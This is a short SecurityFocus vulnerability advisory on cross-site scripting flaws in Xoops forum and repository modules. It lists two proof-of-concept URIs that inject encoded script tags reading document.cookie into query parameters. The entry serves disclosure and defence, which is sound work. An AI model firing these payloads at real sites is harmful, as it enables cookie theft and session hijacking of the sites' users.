Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Xoops Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/xoops/modules/newbb/edit.php?forum=1&topic_id=1&viewmode=flat&order=ASC%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/script%3E&post_id=1
http://www.example.com/xoops/modules/repository/comment_edit.php?com_itemid=1&com_order=0&com_mode=flat&cid=1&cid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/script%3E&com_id=1







 

Privacy Statement
Copyright 2009, SecurityFocus